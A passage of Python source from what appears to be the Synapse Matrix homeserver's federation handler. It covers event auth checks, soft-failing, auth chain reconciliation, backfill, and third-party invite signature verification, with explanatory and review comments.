raise SynapseError(403, "User not from origin", Codes.FORBIDDEN)
event.internal_metadata.outlier = False
await self._handle_new_event(origin, event)
logger.debug(
"on_send_leave_request: After _handle_new_event: %s, sigs: %s",
event.event_id,
event.signatures,
)
return None
async def get_state_for_pdu(self, room_id: str, event_id: str) -> List[EventBase]:
"""Returns the state at the event. i.e. not including said event.
"""
event = await self.store.get_event(event_id, check_room_id=room_id)
state_groups = await self.state_store.get_state_groups(room_id, [event_id])
if state_groups:
_, state = list(state_groups.items()).pop()
results = {(e.type, e.state_key): e for e in state}
if event.is_state():
# Get previous state
if "replaces_state" in event.unsigned:
prev_id = event.unsigned["replaces_state"]
if prev_id != event.event_id:
prev_event = await self.store.get_event(prev_id)
results[(event.type, event.state_key)] = prev_event
else:
del results[(event.type, event.state_key)]
res = list(results.values())
return res
else:
return []
async def get_state_ids_for_pdu(self, room_id: str, event_id: str) -> List[str]:
"""Returns the state at the event. i.e. not including said event.
"""
event = await self.store.get_event(event_id, check_room_id=room_id)
state_groups = await self.state_store.get_state_groups_ids(room_id, [event_id])
if state_groups:
_, state = list(state_groups.items()).pop()
results = state
if event.is_state():
# Get previous state
if "replaces_state" in event.unsigned:
prev_id = event.unsigned["replaces_state"]
if prev_id != event.event_id:
results[(event.type, event.state_key)] = prev_id
else:
results.pop((event.type, event.state_key), None)
return list(results.values())
else:
return []
@log_function
async def on_backfill_request(
self, origin: str, room_id: str, pdu_list: List[str], limit: int
) -> List[EventBase]:
in_room = await self.auth.check_host_in_room(room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
# Synapse asks for 100 events per backfill request. Do not allow more.
limit = min(limit, 100)
events = await self.store.get_backfill_events(room_id, pdu_list, limit)
events = await filter_events_for_server(self.storage, origin, events)
return events
@log_function
async def get_persisted_pdu(
self, origin: str, event_id: str
) -> Optional[EventBase]:
"""Get an event from the database for the given server.
Args:
origin: hostname of server which is requesting the event; we
will check that the server is allowed to see it.
event_id: id of the event being requested
Returns:
None if we know nothing about the event; otherwise the (possibly-redacted) event.
Raises:
AuthError if the server is not currently in the room
"""
event = await self.store.get_event(
event_id, allow_none=True, allow_rejected=True
)
if event:
in_room = await self.auth.check_host_in_room(event.room_id, origin)
if not in_room:
raise AuthError(403, "Host not in room.")
events = await filter_events_for_server(self.storage, origin, [event])
event = events[0]
return event
else:
return None
async def get_min_depth_for_context(self, context):
return await self.store.get_min_depth(context)
    async def _handle_new_event(
        self, origin, event, state=None, auth_events=None, backfilled=False
    ):
        """Prep (auth/state-check) a single event and persist it.

        Push actions are generated first for ordinary events (i.e. not
        outliers, not backfilled, not rejected). If persistence fails, any
        staged push actions are removed again.

        Returns:
            The EventContext computed for the event.
        """
        context = await self._prep_event(
            origin, event, state=state, auth_events=auth_events, backfilled=backfilled
        )
        try:
            if (
                not event.internal_metadata.is_outlier()
                and not backfilled
                and not context.rejected
            ):
                await self.action_generator.handle_push_actions_for_event(
                    event, context
                )
            await self.persist_events_and_notify(
                event.room_id, [(event, context)], backfilled=backfilled
            )
        except Exception:
            # Persisting failed: clear the push actions staged above so they
            # don't linger, then re-raise. This is best-effort, hence the
            # background task.
            run_in_background(
                self.store.remove_push_actions_from_staging, event.event_id
            )
            raise
        return context
async def _handle_new_events(
        self,
        origin: str,
        room_id: str,
        event_infos: Iterable[_NewEventInfo],
        backfilled: bool = False,
    ) -> None:
        """Creates the appropriate contexts and persists events. The events
        should not depend on one another, e.g. this should be used to persist
        a bunch of outliers, but not a chunk of individual events that depend
        on each other for state calculations.

        Notifies about the events where appropriate.
        """

        async def prep(ev_info: _NewEventInfo):
            # Give each event its own logging context so failures can be
            # attributed to a specific event id.
            event = ev_info.event
            with nested_logging_context(suffix=event.event_id):
                res = await self._prep_event(
                    origin,
                    event,
                    state=ev_info.state,
                    auth_events=ev_info.auth_events,
                    backfilled=backfilled,
                )
            return res

        # Prep all events concurrently; consumeErrors=True prevents
        # unhandled-error noise if one of them fails.
        contexts = await make_deferred_yieldable(
            defer.gatherResults(
                [run_in_background(prep, ev_info) for ev_info in event_infos],
                consumeErrors=True,
            )
        )

        # Contexts come back in the same order as event_infos, so zip pairs
        # each event with its own context.
        await self.persist_events_and_notify(
            room_id,
            [
                (ev_info.event, context)
                for ev_info, context in zip(event_infos, contexts)
            ],
            backfilled=backfilled,
        )
async def _persist_auth_tree(
        self,
        origin: str,
        room_id: str,
        auth_events: List[EventBase],
        state: List[EventBase],
        event: EventBase,
        room_version: RoomVersion,
    ) -> int:
        """Checks the auth chain is valid (and passes auth checks) for the
        state and event. Then persists the auth chain and state atomically.
        Persists the event separately. Notifies about the persisted events
        where appropriate.

        Will attempt to fetch missing auth events.

        Args:
            origin: Where the events came from
            room_id: The room the events belong to
            auth_events: The auth chain for ``event``
            state: The room state at ``event``
            event: The event itself
            room_version: The room version we expect this room to have, and
                will raise if it doesn't match the version in the create event.

        Returns:
            The stream id from persisting ``event``.
        """
        events_to_context = {}
        for e in itertools.chain(auth_events, state):
            # Auth/state events are persisted as outliers: we don't have the
            # surrounding DAG for them.
            e.internal_metadata.outlier = True
            ctx = await self.state_handler.compute_event_context(e)
            events_to_context[e.event_id] = ctx

        event_map = {
            e.event_id: e for e in itertools.chain(auth_events, state, [event])
        }

        create_event = None
        for e in auth_events:
            if (e.type, e.state_key) == (EventTypes.Create, ""):
                create_event = e
                break

        if create_event is None:
            # If the state doesn't have a create event then the room is
            # invalid, and it would fail auth checks anyway.
            raise SynapseError(400, "No create event in state")

        room_version_id = create_event.content.get(
            "room_version", RoomVersions.V1.identifier
        )

        if room_version.identifier != room_version_id:
            raise SynapseError(400, "Room version mismatch")

        # Collect auth-event ids referenced by anything here that we weren't
        # given, and try to fetch them from the origin.
        missing_auth_events = set()
        for e in itertools.chain(auth_events, state, [event]):
            for e_id in e.auth_event_ids():
                if e_id not in event_map:
                    missing_auth_events.add(e_id)

        for e_id in missing_auth_events:
            m_ev = await self.federation_client.get_pdu(
                [origin], e_id, room_version=room_version, outlier=True, timeout=10000,
            )
            if m_ev and m_ev.event_id == e_id:
                event_map[e_id] = m_ev
            else:
                logger.info("Failed to find auth event %r", e_id)

        # Auth-check every event against the auth events we now know about.
        for e in itertools.chain(auth_events, state, [event]):
            auth_for_e = {
                (event_map[e_id].type, event_map[e_id].state_key): event_map[e_id]
                for e_id in e.auth_event_ids()
                if e_id in event_map
            }
            if create_event:
                auth_for_e[(EventTypes.Create, "")] = create_event

            try:
                event_auth.check(room_version, e, auth_events=auth_for_e)
            except SynapseError as err:
                # we may get SynapseErrors here as well as AuthErrors. For
                # instance, there are a couple of (ancient) events in some
                # rooms whose senders do not have the correct sigil; these
                # cause SynapseErrors in auth.check. We don't want to give up
                # the attempt to federate altogether in such cases.
                logger.warning("Rejecting %s because %s", e.event_id, err.msg)

                # Only a failure on the event itself is fatal; auth/state
                # events are persisted as rejected instead.
                if e == event:
                    raise
                events_to_context[e.event_id].rejected = RejectedReason.AUTH_ERROR

        # Persist the auth chain and state first, then the event itself.
        await self.persist_events_and_notify(
            room_id,
            [
                (e, events_to_context[e.event_id])
                for e in itertools.chain(auth_events, state)
            ],
        )

        new_event_context = await self.state_handler.compute_event_context(
            event, old_state=state
        )

        return await self.persist_events_and_notify(
            room_id, [(event, new_event_context)]
        )
async def _prep_event(
        self,
        origin: str,
        event: EventBase,
        state: Optional[Iterable[EventBase]],
        auth_events: Optional[MutableStateMap[EventBase]],
        backfilled: bool,
    ) -> EventContext:
        """Compute the event context and run auth / soft-fail checks.

        Args:
            origin: server the event came from
            event: the event to check
            state: the state at the event, if known
            auth_events: pre-computed (type, state_key) -> event map; when
                None it is derived from the state at the event
            backfilled: whether the event came from backfill

        Returns:
            The event context, possibly marked rejected.
        """
        context = await self.state_handler.compute_event_context(event, old_state=state)

        if not auth_events:
            # Derive the auth events from the state prior to the event.
            prev_state_ids = await context.get_prev_state_ids()
            auth_events_ids = self.auth.compute_auth_events(
                event, prev_state_ids, for_verification=True
            )
            auth_events_x = await self.store.get_events(auth_events_ids)
            auth_events = {(e.type, e.state_key): e for e in auth_events_x.values()}

        # This is a hack to fix some old rooms where the initial join event
        # didn't reference the create event in its auth events.
        if event.type == EventTypes.Member and not event.auth_event_ids():
            if len(event.prev_event_ids()) == 1 and event.depth < 5:
                c = await self.store.get_event(
                    event.prev_event_ids()[0], allow_none=True
                )
                if c and c.type == EventTypes.Create:
                    auth_events[(c.type, c.state_key)] = c

        context = await self.do_auth(origin, event, context, auth_events=auth_events)

        # Soft-fail checks only apply to events that passed auth.
        if not context.rejected:
            await self._check_for_soft_fail(event, state, backfilled)

        if event.type == EventTypes.GuestAccess and not context.rejected:
            await self.maybe_kick_guest_users(event)

        return context
async def _check_for_soft_fail(
        self, event: EventBase, state: Optional[Iterable[EventBase]], backfilled: bool
    ) -> None:
        """Checks if we should soft fail the event; if so, marks the event as
        such (via ``internal_metadata.soft_failed``).

        Args:
            event: the event to check
            state: The state at the event if we don't have all the event's prev events
            backfilled: Whether the event is from backfill
        """
        # For new (non-backfilled and non-outlier) events we check if the event
        # passes auth based on the current state. If it doesn't then we
        # "soft-fail" the event.
        if backfilled or event.internal_metadata.is_outlier():
            return

        extrem_ids_list = await self.store.get_latest_event_ids_in_room(event.room_id)
        extrem_ids = set(extrem_ids_list)
        prev_event_ids = set(event.prev_event_ids())

        if extrem_ids == prev_event_ids:
            # If they're the same then the current state is the same as the
            # state at the event, so no point rechecking auth for soft fail.
            return

        room_version = await self.store.get_room_version_id(event.room_id)
        room_version_obj = KNOWN_ROOM_VERSIONS[room_version]

        # Calculate the "current state".
        if state is not None:
            # If we're explicitly given the state then we won't have all the
            # prev events, and so we have a gap in the graph. In this case
            # we want to be a little careful as we might have been down for
            # a while and have an incorrect view of the current state,
            # however we still want to do checks as gaps are easy to
            # maliciously manufacture.
            #
            # So we use a "current state" that is actually a state
            # resolution across the current forward extremities and the
            # given state at the event. This should correctly handle cases
            # like bans, especially with state res v2.
            state_sets_d = await self.state_store.get_state_groups(
                event.room_id, extrem_ids
            )
            state_sets = list(state_sets_d.values())  # type: List[Iterable[EventBase]]
            state_sets.append(state)
            current_states = await self.state_handler.resolve_events(
                room_version, state_sets, event
            )
            current_state_ids = {
                k: e.event_id for k, e in current_states.items()
            }  # type: StateMap[str]
        else:
            current_state_ids = await self.state_handler.get_current_state_ids(
                event.room_id, latest_event_ids=extrem_ids
            )

        logger.debug(
            "Doing soft-fail check for %s: state %s", event.event_id, current_state_ids,
        )

        # Now check if event pass auth against said current state, using only
        # the state events relevant to auth for this event type.
        auth_types = auth_types_for_event(event)
        current_state_ids_list = [
            e for k, e in current_state_ids.items() if k in auth_types
        ]

        auth_events_map = await self.store.get_events(current_state_ids_list)
        current_auth_events = {
            (e.type, e.state_key): e for e in auth_events_map.values()
        }

        try:
            event_auth.check(room_version_obj, event, auth_events=current_auth_events)
        except AuthError as e:
            # Soft-fail rather than reject: the event stays in the DAG but is
            # hidden from clients.
            logger.warning("Soft-failing %r because %s", event, e)
            event.internal_metadata.soft_failed = True
async def on_query_auth(
        self, origin, event_id, room_id, remote_auth_chain, rejects, missing
    ):
        """Handle a federation query_auth request: ingest the remote's auth
        chain and return the difference against our own.

        NOTE(review): ``rejects`` and ``missing`` are accepted but unused here.
        """
        in_room = await self.auth.check_host_in_room(room_id, origin)
        if not in_room:
            raise AuthError(403, "Host not in room.")

        event = await self.store.get_event(event_id, check_room_id=room_id)

        # Just go through and process each event in `remote_auth_chain`. We
        # don't want to fall into the trap of `missing` being wrong.
        for e in remote_auth_chain:
            try:
                await self._handle_new_event(origin, e)
            except AuthError:
                # Events that fail auth are simply skipped.
                pass

        # Now get the current auth_chain for the event.
        local_auth_chain = await self.store.get_auth_chain(
            list(event.auth_event_ids()), include_given=True
        )

        # TODO: Check if we would now reject event_id. If so we need to tell
        # everyone.
        ret = await self.construct_auth_difference(local_auth_chain, remote_auth_chain)

        logger.debug("on_query_auth returning: %s", ret)

        return ret
async def on_get_missing_events(
        self, origin, room_id, earliest_events, latest_events, limit
    ):
        """Serve a /get_missing_events request from a remote server.

        Checks the requester is in the room, caps the number of events, and
        filters the result for the requester's visibility.
        """
        if not await self.auth.check_host_in_room(room_id, origin):
            raise AuthError(403, "Host not in room.")

        # Only allow up to 20 events to be retrieved per request.
        capped_limit = min(limit, 20)

        found_events = await self.store.get_missing_events(
            room_id=room_id,
            earliest_events=earliest_events,
            latest_events=latest_events,
            limit=capped_limit,
        )

        return await filter_events_for_server(self.storage, origin, found_events)
async def do_auth(
        self,
        origin: str,
        event: EventBase,
        context: EventContext,
        auth_events: MutableStateMap[EventBase],
    ) -> EventContext:
        """Run the auth check for an event, marking the context rejected on
        failure rather than raising.

        Args:
            origin: server the event came from
            event: the event being checked
            context: the event's context
            auth_events:
                Map from (event_type, state_key) to event

                Normally, our calculated auth_events based on the state of the room
                at the event's position in the DAG, though occasionally (eg if the
                event is an outlier), may be the auth events claimed by the remote
                server.

                Also NB that this function adds entries to it.

        Returns:
            updated context object
        """
        room_version = await self.store.get_room_version_id(event.room_id)
        room_version_obj = KNOWN_ROOM_VERSIONS[room_version]

        try:
            # Best-effort reconciliation of our auth events against the
            # remote's before running the auth check proper.
            context = await self._update_auth_events_and_context_for_auth(
                origin, event, context, auth_events
            )
        except Exception:
            # We don't really mind if the above fails, so lets not fail
            # processing if it does. However, it really shouldn't fail so
            # let's still log as an exception since we'll still want to fix
            # any bugs.
            logger.exception(
                "Failed to double check auth events for %s with remote. "
                "Ignoring failure and continuing processing of event.",
                event.event_id,
            )

        try:
            event_auth.check(room_version_obj, event, auth_events=auth_events)
        except AuthError as e:
            # Rejected, not raised: callers inspect context.rejected.
            logger.warning("Failed auth resolution for %r because %s", event, e)
            context.rejected = RejectedReason.AUTH_ERROR

        return context
async def _update_auth_events_and_context_for_auth(
        self,
        origin: str,
        event: EventBase,
        context: EventContext,
        auth_events: MutableStateMap[EventBase],
    ) -> EventContext:
        """Helper for do_auth. See there for docs.

        Checks whether a given event has the expected auth events. If it
        doesn't then we talk to the remote server to compare state to see if
        we can come to a consensus (e.g. if one server missed some valid
        state).

        This attempts to resolve any potential divergence of state between
        servers, but is not essential and so failures should not block further
        processing of the event.

        Args:
            origin: server the event came from
            event: the event being checked
            context: the event's context
            auth_events:
                Map from (event_type, state_key) to event

                Normally, our calculated auth_events based on the state of the room
                at the event's position in the DAG, though occasionally (eg if the
                event is an outlier), may be the auth events claimed by the remote
                server.

                Also NB that this function adds entries to it.

        Returns:
            updated context
        """
        event_auth_events = set(event.auth_event_ids())

        # missing_auth is the set of the event's auth_events which we don't yet have
        # in auth_events.
        missing_auth = event_auth_events.difference(
            e.event_id for e in auth_events.values()
        )

        # if we have missing events, we need to fetch those events from somewhere.
        #
        # we start by checking if they are in the store, and then try calling /event_auth/.
        if missing_auth:
            have_events = await self.store.have_seen_events(missing_auth)
            logger.debug("Events %s are in the store", have_events)
            missing_auth.difference_update(have_events)

        if missing_auth:
            # If we don't have all the auth events, we need to get them.
            logger.info("auth_events contains unknown events: %s", missing_auth)
            try:
                try:
                    remote_auth_chain = await self.federation_client.get_event_auth(
                        origin, event.room_id, event.event_id
                    )
                except RequestSendFailed as e1:
                    # The other side isn't around or doesn't implement the
                    # endpoint, so lets just bail out.
                    logger.info("Failed to get event auth from remote: %s", e1)
                    return context

                seen_remotes = await self.store.have_seen_events(
                    [e.event_id for e in remote_auth_chain]
                )

                for e in remote_auth_chain:
                    # Skip events we already have, and the event itself.
                    if e.event_id in seen_remotes:
                        continue

                    if e.event_id == event.event_id:
                        continue

                    try:
                        # Build the auth map for this chain event from the
                        # chain itself, then persist it as an outlier.
                        auth_ids = e.auth_event_ids()
                        auth = {
                            (e.type, e.state_key): e
                            for e in remote_auth_chain
                            if e.event_id in auth_ids or e.type == EventTypes.Create
                        }
                        e.internal_metadata.outlier = True

                        logger.debug(
                            "do_auth %s missing_auth: %s", event.event_id, e.event_id
                        )
                        await self._handle_new_event(origin, e, auth_events=auth)

                        if e.event_id in event_auth_events:
                            auth_events[(e.type, e.state_key)] = e
                    except AuthError:
                        pass

            except Exception:
                logger.exception("Failed to get auth chain")

        if event.internal_metadata.is_outlier():
            # XXX: given that, for an outlier, we'll be working with the
            # event's *claimed* auth events rather than those we calculated:
            # (a) is there any point in this test, since different_auth below will
            # obviously be empty
            # (b) alternatively, why don't we do it earlier?
            logger.info("Skipping auth_event fetch for outlier")
            return context

        different_auth = event_auth_events.difference(
            e.event_id for e in auth_events.values()
        )

        if not different_auth:
            return context

        logger.info(
            "auth_events refers to events which are not in our calculated auth "
            "chain: %s",
            different_auth,
        )

        # XXX: currently this checks for redactions but I'm not convinced that is
        # necessary?
        different_events = await self.store.get_events_as_list(different_auth)

        for d in different_events:
            if d.room_id != event.room_id:
                logger.warning(
                    "Event %s refers to auth_event %s which is in a different room",
                    event.event_id,
                    d.event_id,
                )

                # don't attempt to resolve the claimed auth events against our own
                # in this case: just use our own auth events.
                #
                # XXX: should we reject the event in this case? It feels like we should,
                # but then shouldn't we also do so if we've failed to fetch any of the
                # auth events?
                return context

        # now we state-resolve between our own idea of the auth events, and the remote's
        # idea of them.
        local_state = auth_events.values()
        remote_auth_events = dict(auth_events)
        remote_auth_events.update({(d.type, d.state_key): d for d in different_events})
        remote_state = remote_auth_events.values()

        room_version = await self.store.get_room_version_id(event.room_id)
        new_state = await self.state_handler.resolve_events(
            room_version, (local_state, remote_state), event
        )

        logger.info(
            "After state res: updating auth_events with new state %s",
            {
                (d.type, d.state_key): d.event_id
                for d in new_state.values()
                if auth_events.get((d.type, d.state_key)) != d
            },
        )

        auth_events.update(new_state)

        context = await self._update_context_for_auth_events(
            event, context, auth_events
        )

        return context
async def _update_context_for_auth_events(
        self, event: EventBase, context: EventContext, auth_events: StateMap[EventBase]
    ) -> EventContext:
        """Update the state_ids in an event context after auth event resolution,
        storing the changes as a new state group.

        Args:
            event: The event we're handling the context for
            context: initial event context
            auth_events: Events to update in the event context.

        Returns:
            new event context
        """
        # exclude the state key of the new event from the current_state in the context.
        if event.is_state():
            event_key = (event.type, event.state_key)  # type: Optional[Tuple[str, str]]
        else:
            event_key = None
        state_updates = {
            k: a.event_id for k, a in auth_events.items() if k != event_key
        }

        current_state_ids = await context.get_current_state_ids()
        current_state_ids = dict(current_state_ids)  # type: ignore

        current_state_ids.update(state_updates)

        # prev state gets all auth events, including the event's own key.
        prev_state_ids = await context.get_prev_state_ids()
        prev_state_ids = dict(prev_state_ids)

        prev_state_ids.update({k: a.event_id for k, a in auth_events.items()})

        # create a new state group as a delta from the existing one.
        prev_group = context.state_group
        state_group = await self.state_store.store_state_group(
            event.event_id,
            event.room_id,
            prev_group=prev_group,
            delta_ids=state_updates,
            current_state_ids=current_state_ids,
        )

        return EventContext.with_state(
            state_group=state_group,
            state_group_before_event=context.state_group_before_event,
            current_state_ids=current_state_ids,
            prev_state_ids=prev_state_ids,
            prev_group=prev_group,
            delta_ids=state_updates,
        )
async def construct_auth_difference(
        self, local_auth: Iterable[EventBase], remote_auth: Iterable[EventBase]
    ) -> Dict:
        """ Given a local and remote auth chain, find the differences. This
        assumes that we have already processed all events in remote_auth

        Params:
            local_auth (list)
            remote_auth (list)

        Returns:
            dict with keys "auth_chain", "rejects" and "missing"
        """

        logger.debug("construct_auth_difference Start!")

        # TODO: Make sure we are OK with local_auth or remote_auth having more
        # auth events in them than strictly necessary.

        def sort_fun(ev):
            # Sort by depth first, event_id as tie-break.
            return ev.depth, ev.event_id

        logger.debug("construct_auth_difference after sort_fun!")

        # We find the differences by starting at the "bottom" of each list
        # and iterating up on both lists. The lists are ordered by depth and
        # then event_id, we iterate up both lists until we find the event ids
        # don't match. Then we look at depth/event_id to see which side is
        # missing that event, and iterate only up that list. Repeat.

        remote_list = list(remote_auth)
        remote_list.sort(key=sort_fun)

        local_list = list(local_auth)
        local_list.sort(key=sort_fun)

        local_iter = iter(local_list)
        remote_iter = iter(remote_list)

        logger.debug("construct_auth_difference before get_next!")

        def get_next(it, opt=None):
            # Next item from `it`, or `opt` once exhausted.
            try:
                return next(it)
            except Exception:
                return opt

        current_local = get_next(local_iter)
        current_remote = get_next(remote_iter)

        logger.debug("construct_auth_difference before while")

        missing_remotes = []
        missing_locals = []
        while current_local or current_remote:
            if current_remote is None:
                missing_locals.append(current_local)
                current_local = get_next(local_iter)
                continue

            if current_local is None:
                missing_remotes.append(current_remote)
                current_remote = get_next(remote_iter)
                continue

            if current_local.event_id == current_remote.event_id:
                current_local = get_next(local_iter)
                current_remote = get_next(remote_iter)
                continue

            if current_local.depth < current_remote.depth:
                missing_locals.append(current_local)
                current_local = get_next(local_iter)
                continue

            if current_local.depth > current_remote.depth:
                missing_remotes.append(current_remote)
                current_remote = get_next(remote_iter)
                continue

            # They have the same depth, so we fall back to the event_id order
            if current_local.event_id < current_remote.event_id:
                missing_locals.append(current_local)
                current_local = get_next(local_iter)

            # NOTE(review): if the branch above just advanced current_local,
            # it may now be None, and the attribute access below would raise
            # AttributeError. Looks like this assumes the local list is not
            # exhausted exactly here — TODO confirm.
            if current_local.event_id > current_remote.event_id:
                missing_remotes.append(current_remote)
                current_remote = get_next(remote_iter)
                continue

        logger.debug("construct_auth_difference after while")

        # missing locals should be sent to the server
        # We should find why we are missing remotes, as they will have been
        # rejected.

        # Remove events from missing_remotes if they are referencing a missing
        # remote. We only care about the "root" rejected ones.
        missing_remote_ids = [e.event_id for e in missing_remotes]
        base_remote_rejected = list(missing_remotes)
        for e in missing_remotes:
            for e_id in e.auth_event_ids():
                if e_id in missing_remote_ids:
                    try:
                        base_remote_rejected.remove(e)
                    except ValueError:
                        pass

        reason_map = {}

        for e in base_remote_rejected:
            reason = await self.store.get_rejection_reason(e.event_id)
            if reason is None:
                # TODO: e is not in the current state, so we should
                # construct some proof of that.
                continue

            reason_map[e.event_id] = reason

        logger.debug("construct_auth_difference returning")

        return {
            "auth_chain": local_auth,
            "rejects": {
                e.event_id: {"reason": reason_map[e.event_id], "proof": None}
                for e in base_remote_rejected
            },
            "missing": [e.event_id for e in missing_locals],
        }
@log_function
async def exchange_third_party_invite(
        self, sender_user_id, target_user_id, room_id, signed
    ):
        """Turn a signed third-party (3pid) invite into an m.room.member
        invite.

        If this homeserver is in the room the event is built, validated,
        signature-checked and sent locally; otherwise the request is forwarded
        to a server that is in the room.
        """
        third_party_invite = {"signed": signed}

        event_dict = {
            "type": EventTypes.Member,
            "content": {
                "membership": Membership.INVITE,
                "third_party_invite": third_party_invite,
            },
            "room_id": room_id,
            "sender": sender_user_id,
            "state_key": target_user_id,
        }

        if await self.auth.check_host_in_room(room_id, self.hs.hostname):
            room_version = await self.store.get_room_version_id(room_id)
            builder = self.event_builder_factory.new(room_version, event_dict)

            EventValidator().validate_builder(builder)
            event, context = await self.event_creation_handler.create_new_client_event(
                builder=builder
            )

            event, context = await self.add_display_name_to_third_party_invite(
                room_version, event_dict, event, context
            )

            EventValidator().validate_new(event, self.config)

            # We need to tell the transaction queue to send this out, even
            # though the sender isn't a local user.
            event.internal_metadata.send_on_behalf_of = self.hs.hostname

            try:
                await self.auth.check_from_context(room_version, event, context)
            except AuthError as e:
                logger.warning("Denying new third party invite %r because %s", event, e)
                raise e

            await self._check_signature(event, context)

            # We retrieve the room member handler here as to not cause a cyclic dependency
            member_handler = self.hs.get_room_member_handler()
            await member_handler.send_membership_event(None, event, context)
        else:
            # We're not in the room, so ask the servers derived from the
            # sender and room id to do the exchange for us.
            destinations = {x.split(":", 1)[-1] for x in (sender_user_id, room_id)}

            await self.federation_client.forward_third_party_invite(
                destinations, room_id, event_dict
            )
async def on_exchange_third_party_invite_request(
        self, event_dict: JsonDict
    ) -> None:
        """Handle an exchange_third_party_invite request from a remote server

        The remote server will call this when it wants to turn a 3pid invite
        into a normal m.room.member invite.

        Args:
            event_dict: Dictionary containing the event body.
        """
        assert_params_in_dict(event_dict, ["room_id"])
        room_version = await self.store.get_room_version_id(event_dict["room_id"])

        # NB: event_dict has a particular specced format we might need to fudge
        # if we change event formats too much.
        builder = self.event_builder_factory.new(room_version, event_dict)

        event, context = await self.event_creation_handler.create_new_client_event(
            builder=builder
        )
        event, context = await self.add_display_name_to_third_party_invite(
            room_version, event_dict, event, context
        )

        try:
            await self.auth.check_from_context(room_version, event, context)
        except AuthError as e:
            logger.warning("Denying third party invite %r because %s", event, e)
            raise e
        await self._check_signature(event, context)

        # We need to tell the transaction queue to send this out, even
        # though the sender isn't a local user.
        event.internal_metadata.send_on_behalf_of = get_domain_from_id(event.sender)

        # We retrieve the room member handler here as to not cause a cyclic dependency
        member_handler = self.hs.get_room_member_handler()
        await member_handler.send_membership_event(None, event, context)
async def add_display_name_to_third_party_invite(
        self, room_version, event_dict, event, context
    ):
        """Copy the display name from the original 3pid invite event onto the
        membership event, then rebuild the event.

        Returns:
            The rebuilt (event, context) pair.
        """
        key = (
            EventTypes.ThirdPartyInvite,
            event.content["third_party_invite"]["signed"]["token"],
        )
        original_invite = None
        prev_state_ids = await context.get_prev_state_ids()
        original_invite_id = prev_state_ids.get(key)
        if original_invite_id:
            original_invite = await self.store.get_event(
                original_invite_id, allow_none=True
            )
        if original_invite:
            # If the m.room.third_party_invite event's content is empty, it means the
            # invite has been revoked. In this case, we don't have to raise an error here
            # because the auth check will fail on the invite (because it's not able to
            # fetch public keys from the m.room.third_party_invite event's content, which
            # is empty).
            display_name = original_invite.content.get("display_name")
            event_dict["content"]["third_party_invite"]["display_name"] = display_name
        else:
            logger.info(
                "Could not find invite event for third_party_invite: %r", event_dict
            )
            # We don't discard here as this is not the appropriate place to do
            # auth checks. If we need the invite and don't have it then the
            # auth check code will explode appropriately.

        builder = self.event_builder_factory.new(room_version, event_dict)
        EventValidator().validate_builder(builder)
        event, context = await self.event_creation_handler.create_new_client_event(
            builder=builder
        )
        EventValidator().validate_new(event, self.config)
        return (event, context)
async def _check_signature(self, event, context):
        """
        Checks that the signature in the event is consistent with its invite.

        Args:
            event (Event): The m.room.member event to check
            context (EventContext): the event's context

        Raises:
            AuthError: if signature didn't match any keys, or key has been
                revoked,
            SynapseError: if a transient error meant a key couldn't be checked
                for revocation.
        """
        signed = event.content["third_party_invite"]["signed"]
        token = signed["token"]

        # Find the m.room.third_party_invite event this invite claims to match.
        prev_state_ids = await context.get_prev_state_ids()
        invite_event_id = prev_state_ids.get((EventTypes.ThirdPartyInvite, token))

        invite_event = None
        if invite_event_id:
            invite_event = await self.store.get_event(invite_event_id, allow_none=True)

        if not invite_event:
            raise AuthError(403, "Could not find invite")

        logger.debug("Checking auth on event %r", event.content)

        last_exception = None  # type: Optional[Exception]

        # for each public key in the 3pid invite event
        for public_key_object in self.hs.get_auth().get_public_keys(invite_event):
            try:
                # for each sig on the third_party_invite block of the actual invite
                for server, signature_block in signed["signatures"].items():
                    for key_name, encoded_signature in signature_block.items():
                        # Only ed25519 keys are considered.
                        if not key_name.startswith("ed25519:"):
                            continue

                        logger.debug(
                            "Attempting to verify sig with key %s from %r "
                            "against pubkey %r",
                            key_name,
                            server,
                            public_key_object,
                        )

                        try:
                            public_key = public_key_object["public_key"]
                            verify_key = decode_verify_key_bytes(
                                key_name, decode_base64(public_key)
                            )
                            verify_signed_json(signed, server, verify_key)
                            logger.debug(
                                "Successfully verified sig with key %s from %r "
                                "against pubkey %r",
                                key_name,
                                server,
                                public_key_object,
                            )
                        except Exception:
                            logger.info(
                                "Failed to verify sig with key %s from %r "
                                "against pubkey %r",
                                key_name,
                                server,
                                public_key_object,
                            )
                            raise

                        try:
                            # Signature verified; also check the key hasn't
                            # been revoked, if a validity URL was provided.
                            if "key_validity_url" in public_key_object:
                                await self._check_key_revocation(
                                    public_key, public_key_object["key_validity_url"]
                                )
                        except Exception:
                            logger.info(
                                "Failed to query key_validity_url %s",
                                public_key_object["key_validity_url"],
                            )
                            raise

                        # One verified, non-revoked signature is sufficient.
                        return
            except Exception as e:
                # Remember the failure and try the next public key.
                last_exception = e

        if last_exception is None:
            # we can only get here if get_public_keys() returned an empty list
            # TODO: make this better
            raise RuntimeError("no public key in invite event")

        raise last_exception
async def _check_key_revocation(self, public_key, url):
"""
Checks whether public_key has been revoked.
Args:
public_key (str): base-64 encoded public key.
url (str): Key revocation URL.
Raises:
AuthError: if they key has been revoked.
SynapseError: if a transient error meant a key couldn't be checked
for revocation.
"""
try:
response = await self.http_client.get_json(url, {"public_key": public_key})
except Exception:
raise SynapseError(502, "Third party certificate could not be checked")
if "valid" not in response or not response["valid"]:
raise AuthError(403, "Third party certificate was invalid")
async def persist_events_and_notify(
        self,
        room_id: str,
        event_and_contexts: Sequence[Tuple[EventBase, EventContext]],
        backfilled: bool = False,
    ) -> int:
        """Persists events and tells the notifier/pushers about them, if
        necessary.

        Args:
            room_id: The room ID of events being persisted.
            event_and_contexts: Sequence of events with their associated
                context that should be persisted. All events must belong to
                the same room.
            backfilled: Whether these events are a result of
                backfilling or not

        Returns:
            The stream id of the latest persisted event.
        """
        # Each room's events are persisted by one designated worker; if that
        # isn't us, forward over replication instead of persisting locally.
        instance = self.config.worker.events_shard_config.get_instance(room_id)
        if instance != self._instance_name:
            result = await self._send_events(
                instance_name=instance,
                store=self.store,
                room_id=room_id,
                event_and_contexts=event_and_contexts,
                backfilled=backfilled,
            )
            return result["max_stream_id"]
        else:
            assert self.storage.persistence

            # Note that this returns the events that were persisted, which may not be
            # the same as were passed in if some were deduplicated due to transaction IDs.
            events, max_stream_token = await self.storage.persistence.persist_events(
                event_and_contexts, backfilled=backfilled
            )

            if self._ephemeral_messages_enabled:
                for event in events:
                    # If there's an expiry timestamp on the event, schedule its expiry.
                    self._message_handler.maybe_schedule_expiry(event)

            if not backfilled:  # Never notify for backfilled events
                for event in events:
